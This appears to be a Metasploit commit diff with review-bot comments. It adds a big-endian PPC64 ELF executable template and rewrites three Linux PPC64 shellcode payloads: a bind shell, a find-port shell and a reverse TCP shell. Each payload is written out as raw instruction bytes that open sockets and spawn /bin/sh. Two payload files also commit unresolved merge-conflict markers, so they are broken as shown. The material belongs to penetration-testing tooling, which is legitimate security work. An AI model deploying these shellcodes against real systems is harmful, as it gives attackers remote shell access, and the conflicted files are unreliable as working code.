
Commit 00852f4

committed
Adding PPC64 template, fixing PPC64 single payloads
1 parent c0dfbf4 commit 00852f4


7 files changed

+205
-55
lines changed

Lines changed: 35 additions & 0 deletions
@@ -0,0 +1,35 @@
1+
BITS 64
2+
ehdr: ; Elf32_Ehdr
3+
db 0x7F, "ELF", 2, 2, 1, 0 ; e_ident
4+
db 0, 0, 0, 0, 0, 0, 0, 0 ;
5+
dw 0x0200 ; e_type = ET_EXEC for an executable
6+
dw 0x1500 ; e_machine = PPC64
7+
dd 0x01000000 ; e_version
8+
dq 0x7810000000000000 ; e_entry
9+
dq 0x4000000000000000 ; e_phoff
10+
dq 0 ; e_shoff
11+
dd 0 ; e_flags
12+
dw 0x4000 ; e_ehsize
13+
dw 0x3800 ; e_phentsize
14+
dw 0x0100 ; e_phnum
15+
dw 0 ; e_shentsize
16+
dw 0 ; e_shnum
17+
dw 0 ; e_shstrndx
18+
19+
ehdrsize equ $ - ehdr
20+
21+
phdr: ; Elf32_Phdr
22+
23+
dd 0x01000000 ; p_type = pt_load
24+
dd 0x07000000 ; p_flags = rwx
25+
dq 0 ; p_offset
26+
dq 0x0010000000000000 ; p_vaddr
27+
dq 0x0010000000000000 ; p_paddr
28+
dq 0xefbeadde ; p_filesz
29+
dq 0xefbeadde ; p_memsz
30+
dq 0x0000100000000000 ; p_align
31+
32+
phdrsize equ $ - phdr
33+
34+
_start:
35+
dq 0x8010000000000000
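Review bot: The two labels are commented `; Elf32_Ehdr` and `; Elf32_Phdr`, but the layout is the 64-bit form (EI_CLASS is 2, e_entry/e_phoff/p_* are `dq`, e_ehsize is 0x40 and e_phentsize 0x38), so the comments should read `; Elf64_Ehdr` and `; Elf64_Phdr`. Every multi-byte field is written pre-swapped so that a little-endian assembler emits big-endian bytes (`dw 0x0200` for e_type 2, `dw 0x1500` for e_machine 21, `dq 0x0010000000000000` for p_vaddr 0x1000); a one-line comment next to `BITS 64` stating that convention, e.g. `; all fields are byte-swapped by hand: output is a big-endian ELF64`, would save the next reader from re-deriving it. The `dq 0x8010000000000000` at `_start` is undocumented: read big-endian it is 0x1080, i.e. p_vaddr plus the 128-byte template, so it presumably is the entry word that points at the payload appended after the template — confirm and say so in a comment. The `0xefbeadde` in p_filesz/p_memsz looks like a placeholder patched at build time; a comment naming what patches it would help.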
128 Bytes
Binary file not shown.
Lines changed: 10 additions & 0 deletions
@@ -0,0 +1,10 @@
1+
# -*- coding: binary -*-
2+
3+
###
4+
#
5+
# This mixin provides support for generating PrependInject blocks for Linux payloads
6+
#
7+
###
8+
module Msf::Payload::Linux::PrependInject
9+
10+
end
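Review bot: The header comment states that this mixin "provides support for generating PrependInject blocks for Linux payloads", but the module body is empty, so nothing is provided yet and any payload that includes it gets no behaviour. Either add `# TODO: no methods yet; see the PrependInject support this is meant to carry` inside the module, or leave the file out of this commit until it defines something; as far as the visible hunks show, nothing in this commit includes the module either.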

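--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -1232,6 +1232,16 @@ def self.to_linux_aarch64_elf(framework, code, opts = {})
 to_exe_elf(framework, opts, "template_aarch64_linux.bin", code)
 end
 
+# self.to_linux_ppc64_elf
+#
+# @param framework [Msf::Framework]
+# @param code [String]
+# @param opts [Hash]
+# @option [String] :template
+# @return [String] Returns an elf
+def self.to_linux_ppc64_elf(framework, code, opts = {})
+to_exe_elf(framework, opts, "template_ppc64_linux.bin", code, true)
+end
 # self.to_linux_mipsle_elf
 # Little Endian
 # @param framework [Msf::Framework]
@@ -2178,6 +2188,8 @@ def self.to_executable_fmt(framework, arch, plat, code, fmt, exeopts)
 to_linux_x64_elf(framework, code, exeopts)
 when ARCH_AARCH64
 to_linux_aarch64_elf(framework, code, exeopts)
+when ARCH_PPC64
+to_linux_ppc64_elf(framework, code, exeopts)
 when ARCH_ARMLE
 to_linux_armle_elf(framework, code, exeopts)
 when ARCH_MIPSBE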
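Review bot: The call `to_exe_elf(framework, opts, "template_ppc64_linux.bin", code, true)` passes a bare positional `true` as a fifth argument, while the neighbouring `to_linux_aarch64_elf` passes only four, so a reader cannot tell from this hunk what the flag selects. Given that the PPC64 template in this commit writes its header big-endian, it presumably tells `to_exe_elf` to patch the header fields big-endian; please make that explicit, either with a trailing comment `to_exe_elf(framework, opts, "template_ppc64_linux.bin", code, true) # big-endian header` or, better, by documenting the parameter in the YARD block above the method. The `when ARCH_PPC64` arm in the second hunk is fine as written; `to_executable_fmt` itself starts and ends outside the hunk.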

modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb

Lines changed: 55 additions & 55 deletions
@@ -28,61 +28,61 @@ def initialize(info = {})
2828
'LPORT' => [ 58, 'n' ]
2929
},
3030
'Payload' =>
31-
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
32-
"\x3b\xa0\x01\xff" + # li r29,511 #
33-
"\x3b\x9d\xfe\x02" + # addi r28,r29,-510 #
34-
"\x3b\x7d\xfe\x03" + # addi r27,r29,-509 #
35-
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
36-
"\xfb\x81\xff\xf9" + # stdu r28,-8(r1) #
37-
"\xfb\x61\xff\xf9" + # stdu r27,-8(r1) #
38-
"\x7c\x24\x0b\x78" + # mr r4,r1 #
39-
"\x38\x7d\xfe\x02" + # addi r3,r29,-510 #
40-
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
41-
"\x44\xff\xff\x02" + # sc #
42-
"\x7c\x7a\x1b\x78" + # mr r26,r3 #
43-
"\x3b\x3d\xfe\x11" + # addi r25,r29,-495 #
44-
"\x3e\xe0\xff\x02" + # lis r23,-254 #
45-
"\x62\xf7\x04\xd2" + # ori r23,r23,1234 #
46-
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
47-
"\x96\xe1\xff\xfc" + # stwu r23,-4(r1) #
48-
"\x7c\x36\x0b\x78" + # mr r22,r1 #
49-
"\xfb\x21\xff\xf9" + # stdu r25,-8(r1) #
50-
"\xfa\xc1\xff\xf9" + # stdu r22,-8(r1) #
51-
"\xfb\x41\xff\xf9" + # stdu r26,-8(r1) #
52-
"\x7c\x24\x0b\x78" + # mr r4,r1 #
53-
"\x38\x7d\xfe\x03" + # addi r3,r29,-509 #
54-
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
55-
"\x44\xff\xff\x02" + # sc #
56-
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
57-
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
58-
"\xfb\x41\xff\xf9" + # stdu r26,-8(r1) #
59-
"\x7c\x24\x0b\x78" + # mr r4,r1 #
60-
"\x38\x7d\xfe\x05" + # addi r3,r29,-507 #
61-
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
62-
"\x44\xff\xff\x02" + # sc #
63-
"\x7c\x24\x0b\x78" + # mr r4,r1 #
64-
"\x38\x7d\xfe\x06" + # addi r3,r29,-506 #
65-
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
66-
"\x44\xff\xff\x02" + # sc #
67-
"\x7c\x75\x1b\x78" + # mr r21,r3 #
68-
"\x7f\x64\xdb\x78" + # mr r4,r27 #
69-
"\x7e\xa3\xab\x78" + # mr r3,r21 #
70-
"\x38\x1d\xfe\x40" + # addi r0,r29,-448 #
71-
"\x44\xff\xff\x02" + # sc #
72-
"\x37\x7b\xff\xff" + # addic. r27,r27,-1 #
73-
"\x40\x80\xff\xec" + # bge+ <bndsockcode64+148> #
74-
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
75-
"\x40\x82\xff\xfd" + # bnel+ <bndsockcode64+172> #
76-
"\x7f\xc8\x02\xa6" + # mflr r30 #
77-
"\x3b\xde\x01\xff" + # addi r30,r30,511 #
78-
"\x38\x7e\xfe\x25" + # addi r3,r30,-475 #
79-
"\x98\xbe\xfe\x2c" + # stb r5,-468(r30) #
80-
"\xf8\xa1\xff\xf9" + # stdu r5,-8(r1) #
81-
"\xf8\x61\xff\xf9" + # stdu r3,-8(r1) #
82-
"\x7c\x24\x0b\x78" + # mr r4,r1 #
83-
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
84-
"\x44\xff\xff\x02" + # sc #
85-
'/bin/sh'
31+
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
32+
"\x3b\xa0\x01\xff" + # li r29,511 #
33+
"\x3b\x9d\xfe\x02" + # addi r28,r29,-510 #
34+
"\x3b\x7d\xfe\x03" + # addi r27,r29,-509 #
35+
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
36+
"\xfb\x81\xff\xf9" + # stdu r28,-8(r1) #
37+
"\xfb\x61\xff\xf9" + # stdu r27,-8(r1) #
38+
"\x7c\x24\x0b\x78" + # mr r4,r1 #
39+
"\x38\x7d\xfe\x02" + # addi r3,r29,-510 #
40+
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
41+
"\x44\xff\xff\x02" + # sc #
42+
"\x7c\x7a\x1b\x78" + # mr r26,r3 #
43+
"\x3b\x3d\xfe\x11" + # addi r25,r29,-495 #
44+
"\x3e\xe0\xff\x02" + # lis r23,-254 #
45+
"\x62\xf7\x04\xd2" + # ori r23,r23,1234 #
46+
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
47+
"\x96\xe1\xff\xfc" + # stwu r23,-4(r1) #
48+
"\x7c\x36\x0b\x78" + # mr r22,r1 #
49+
"\xfb\x21\xff\xf9" + # stdu r25,-8(r1) #
50+
"\xfa\xc1\xff\xf9" + # stdu r22,-8(r1) #
51+
"\xfb\x41\xff\xf9" + # stdu r26,-8(r1) #
52+
"\x7c\x24\x0b\x78" + # mr r4,r1 #
53+
"\x38\x7d\xfe\x03" + # addi r3,r29,-509 #
54+
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
55+
"\x44\xff\xff\x02" + # sc #
56+
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
57+
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
58+
"\xfb\x41\xff\xf9" + # stdu r26,-8(r1) #
59+
"\x7c\x24\x0b\x78" + # mr r4,r1 #
60+
"\x38\x7d\xfe\x05" + # addi r3,r29,-507 #
61+
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
62+
"\x44\xff\xff\x02" + # sc #
63+
"\x7c\x24\x0b\x78" + # mr r4,r1 #
64+
"\x38\x7d\xfe\x06" + # addi r3,r29,-506 #
65+
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
66+
"\x44\xff\xff\x02" + # sc #
67+
"\x7c\x75\x1b\x78" + # mr r21,r3 #
68+
"\x7f\x64\xdb\x78" + # mr r4,r27 #
69+
"\x7e\xa3\xab\x78" + # mr r3,r21 #
70+
"\x38\x1d\xfe\x40" + # addi r0,r29,-448 #
71+
"\x44\xff\xff\x02" + # sc #
72+
"\x37\x7b\xff\xff" + # addic. r27,r27,-1 #
73+
"\x40\x80\xff\xec" + # bge+ <bndsockcode64+148> #
74+
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
75+
"\x40\x82\xff\xfd" + # bnel+ <bndsockcode64+172> #
76+
"\x7f\xc8\x02\xa6" + # mflr r30 #
77+
"\x3b\xde\x01\xff" + # addi r30,r30,511 #
78+
"\x38\x7e\xfe\x25" + # addi r3,r30,-475 #
79+
"\x98\xbe\xfe\x2c" + # stb r5,-468(r30) #
80+
"\xf8\xa1\xff\xf9" + # stdu r5,-8(r1) #
81+
"\xf8\x61\xff\xf9" + # stdu r3,-8(r1) #
82+
"\x7c\x24\x0b\x78" + # mr r4,r1 #
83+
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
84+
"\x44\xff\xff\x02" + # sc #
85+
"/bin/sh"
8686
}
8787
)
8888
)
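Review bot: Every `sc` in this file's new side is still encoded `"\x44\xff\xff\x02"`, whereas the other two modules in this commit, shell_find_port.rb and shell_reverse_tcp.rb, replace that encoding with `"\x44\x00\x00\x02"` on their new side; if that encoding change is the "fixing PPC64 single payloads" the commit title refers to, this file appears to have been missed, since apart from `'/bin/sh'` becoming `"/bin/sh"` the added lines look byte-for-byte identical to the removed ones. A short comment on the first `sc` line stating which encoding is intended and why would prevent the two variants from drifting apart again. The enclosing `initialize` starts and ends outside the hunk.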

modules/payloads/singles/linux/ppc64/shell_find_port.rb

Lines changed: 45 additions & 0 deletions
@@ -28,6 +28,7 @@ def initialize(info = {})
2828
'CPORT' => [ 86, 'n' ]
2929
},
3030
'Payload' =>
31+
<<<<<<< HEAD
3132
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
3233
"\x3b\xa0\x01\xff" + # li r29,511 #
3334
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
@@ -70,6 +71,50 @@ def initialize(info = {})
7071
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
7172
"\x44\xff\xff\x02" + # sc #
7273
'/bin/sh'
74+
=======
75+
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
76+
"\x3b\xa0\x01\xff" + # li r29,511 #
77+
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
78+
"\x7c\x3c\x0b\x78" + # mr r28,r1 #
79+
"\x3b\x7d\xfe\x11" + # addi r27,r29,-495 #
80+
"\x97\x61\xff\xfc" + # stwu r27,-4(r1) #
81+
"\x7c\x3a\x0b\x78" + # mr r26,r1 #
82+
"\xfb\x41\xff\xf9" + # stdu r26,-8(r1) #
83+
"\xfb\x81\xff\xf9" + # stdu r28,-8(r1) #
84+
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
85+
"\x3b\xff\x01\xff" + # addi r31,r31,511 #
86+
"\x3b\xff\xfe\x02" + # addi r31,r31,-510 #
87+
"\x38\x21\x01\xff" + # addi r1,r1,511 #
88+
"\x38\x21\xfe\x09" + # addi r1,r1,-503 #
89+
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
90+
"\x7c\x24\x0b\x78" + # mr r4,r1 #
91+
"\x38\x7d\xfe\x08" + # addi r3,r29,-504 #
92+
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
93+
"\x44\x00\x00\x02" + # sc #
94+
"\x3b\x3c\x01\xff" + # addi r25,r28,511 #
95+
"\xa3\x39\xfe\x03" + # lhz r25,-509(r25) #
96+
"\x28\x19\x04\xd2" + # cmplwi r25,1234 #
97+
"\x40\x82\xff\xd0" + # bne+ <fndsockcode64+40> #
98+
"\x3b\x1d\xfe\x03" + # addi r24,r29,-509 #
99+
"\x7f\x04\xc3\x78" + # mr r4,r24 #
100+
"\x7f\xe3\xfb\x78" + # mr r3,r31 #
101+
"\x38\x1d\xfe\x40" + # addi r0,r29,-448 #
102+
"\x44\x00\x00\x02" + # sc #
103+
"\x37\x18\xff\xff" + # addic. r24,r24,-1 #
104+
"\x40\x80\xff\xec" + # bge+ <fndsockcode64+96> #
105+
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
106+
"\x40\x82\xff\xfd" + # bnel+ <fndsockcode64+120> #
107+
"\x7f\xc8\x02\xa6" + # mflr r30 #
108+
"\x3b\xde\x01\xff" + # addi r30,r30,511 #
109+
"\x38\x7e\xfe\x25" + # addi r3,r30,-475 #
110+
"\x98\xbe\xfe\x2c" + # stb r5,-468(r30) #
111+
"\xf8\xa1\xff\xf9" + # stdu r5,-8(r1) #
112+
"\xf8\x61\xff\xf9" + # stdu r3,-8(r1) #
113+
"\x7c\x24\x0b\x78" + # mr r4,r1 #
114+
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
115+
"\x44\x00\x00\x02" + # sc #
116+
"/bin/sh"
117+
>>>>>>> d127729c5cf (Adding PPC64 template, fixing PPC64 single payloads)
73118
}
74119
)
75120
)
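Review bot: The new side of both hunks commits unresolved merge conflict markers — `<<<<<<< HEAD` after `'Payload' =>`, `=======` after the old `'/bin/sh'`, and `>>>>>>> d127729c5cf (...)` before the closing `}` — so the file is not valid Ruby and the module cannot load; the same markers are committed in modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb. Even if the markers parsed, the `'Payload'` value would be the old string followed by the new one, so the `'CPORT' => [ 86, 'n' ]` offset (and `'LPORT'` in shell_reverse_tcp.rb) would no longer point at the intended bytes. The fix is to resolve the conflict by deleting the three marker lines together with the old payload between `<<<<<<< HEAD` and `=======`, keeping only the new `"\x44\x00\x00\x02"` variant ending in `"/bin/sh"`, and then re-checking the port offset against the resulting string. `initialize` starts and ends outside the hunks.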

modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb

Lines changed: 48 additions & 0 deletions
@@ -29,6 +29,7 @@ def initialize(info = {})
2929
'LPORT' => [ 62, 'n' ]
3030
},
3131
'Payload' =>
32+
<<<<<<< HEAD
3233
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
3334
"\x3b\xa0\x01\xff" + # li r29,511 #
3435
"\x3b\x9d\xfe\x02" + # addi r28,r29,-510 #
@@ -74,6 +75,53 @@ def initialize(info = {})
7475
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
7576
"\x44\xff\xff\x02" + # sc #
7677
'/bin/sh'
78+
=======
79+
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
80+
"\x3b\xa0\x01\xff" + # li r29,511 #
81+
"\x3b\x9d\xfe\x02" + # addi r28,r29,-510 #
82+
"\x3b\x7d\xfe\x03" + # addi r27,r29,-509 #
83+
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
84+
"\xfb\x81\xff\xf9" + # stdu r28,-8(r1) #
85+
"\xfb\x61\xff\xf9" + # stdu r27,-8(r1) #
86+
"\x7c\x24\x0b\x78" + # mr r4,r1 #
87+
"\x38\x7d\xfe\x02" + # addi r3,r29,-510 #
88+
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
89+
"\x44\x00\x00\x02" + # sc #
90+
"\x7c\x7a\x1b\x78" + # mr r26,r3 #
91+
"\x3b\x3d\xfe\x11" + # addi r25,r29,-495 #
92+
"\x3e\xe0\x7f\x00" + # lis r23,32512 #
93+
"\x62\xf7\x00\x01" + # ori r23,r23,1 #
94+
"\x3a\xc0\x04\xd2" + # li r22,1234 #
95+
"\x96\xe1\xff\xfc" + # stwu r23,-4(r1) #
96+
"\x96\xc1\xff\xfc" + # stwu r22,-4(r1) #
97+
"\x93\x61\xff\xfe" + # stw r27,-2(r1) #
98+
"\x7c\x35\x0b\x78" + # mr r21,r1 #
99+
"\xfb\x21\xff\xf9" + # stdu r25,-8(r1) #
100+
"\xfa\xa1\xff\xf9" + # stdu r21,-8(r1) #
101+
"\xfb\x41\xff\xf9" + # stdu r26,-8(r1) #
102+
"\x7c\x24\x0b\x78" + # mr r4,r1 #
103+
"\x38\x7d\xfe\x04" + # addi r3,r29,-508 #
104+
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
105+
"\x44\x00\x00\x02" + # sc #
106+
"\x7f\x64\xdb\x78" + # mr r4,r27 #
107+
"\x7f\x43\xd3\x78" + # mr r3,r26 #
108+
"\x38\x1d\xfe\x40" + # addi r0,r29,-448 #
109+
"\x44\x00\x00\x02" + # sc #
110+
"\x37\x7b\xff\xff" + # addic. r27,r27,-1 #
111+
"\x40\x80\xff\xec" + # bge+ <cntsockcode64+108> #
112+
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
113+
"\x40\x82\xff\xfd" + # bnel+ <cntsockcode64+132> #
114+
"\x7f\xc8\x02\xa6" + # mflr r30 #
115+
"\x3b\xde\x01\xff" + # addi r30,r30,511 #
116+
"\x38\x7e\xfe\x25" + # addi r3,r30,-475 #
117+
"\x98\xbe\xfe\x2c" + # stb r5,-468(r30) #
118+
"\xf8\xa1\xff\xf9" + # stdu r5,-8(r1) #
119+
"\xf8\x61\xff\xf9" + # stdu r3,-8(r1) #
120+
"\x7c\x24\x0b\x78" + # mr r4,r1 #
121+
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
122+
"\x44\x00\x00\x02" + # sc #
123+
"/bin/sh"
124+
>>>>>>> d127729c5cf (Adding PPC64 template, fixing PPC64 single payloads)
77125
}
78126
)
79127
)
